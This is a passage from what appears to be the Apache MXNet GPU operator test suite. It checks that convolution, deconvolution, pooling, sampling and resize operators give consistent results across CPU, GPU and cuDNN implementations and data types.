{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so scale the input magnitude.
scale = 0.1
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
scale = 1
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list, scale=scale)
check_consistency(sym, ctx_list, scale=scale, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list, scale=0.5)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
